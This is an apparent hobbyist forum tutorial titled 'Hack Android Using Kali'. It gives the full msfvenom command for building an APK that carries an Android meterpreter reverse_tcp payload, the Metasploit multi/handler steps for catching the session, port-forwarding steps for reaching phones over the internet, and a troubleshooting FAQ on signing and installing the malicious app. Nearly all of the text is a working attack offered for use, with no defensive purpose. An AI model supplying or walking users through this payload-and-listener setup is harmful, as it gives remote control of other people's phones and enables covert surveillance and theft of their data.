Hack Android Using Kali (UPDATED and FAQ)

Sep 20, 2015 02:37 PM
Nov 4, 2015 12:19 PM
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Hello My Fellow Hackerzz.. This is my first How-to and i'll be updating the "Hacking Android Using Kali" to msfvenom and some FAQ about known problems from comments. So Here we GO!!

For Anything With a *, Please See The FAQ for More Info..


msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4895 R >/root/FILENAME.apk

-p => Specify Payload

LHOST => Your IP* or DDNS

LPORT => Port You want to listen on

R => Means RAW Format

>/root/FILENAME.apk => Location for File

NOTE – There Will be some error about architecture but its ok, let it be.

Easy As That!!


Now before running that app on your android phone, you have to start a handler. You can do that using –

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set LHOST *
  5. set LPORT 4895
  6. exploit

Now Run the app on your android phone and you'll get a meterpreter session opened!!

NOTE – Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.



It's really easy and almost the same.

First You Need to get your public IP. You can find that from THIS WEBSITE.

You also need your private ip. Use ifconfig command in terminal to get that.

Now There are just two small changes in the above steps

i) In the msfvenom command, in LHOST, you need to enter your 'PUBLIC IP'

ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'

That's IT!!

NOTE – You Need To Port forward The Port you used in your modem/router or it won't work.

2) Apk File made from msfvenom is 0 kb

That means you have some spelling or syntax error. Please recheck the command you entered, if its correct, recheck again!!

3) In Phone – Cannot Parse Package

Try Another File Manager, Download a free one from google store!!

4) In Phone – App Not Installed

You May Need to Sign Your APK file, newer android versions may give error. Refer to this site, and go to last to see steps on manually signing. LINK HERE

5) Kali as Virtual Machine

Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!

If There's Any other problem, type in the comment!! I'll try my best to help!!

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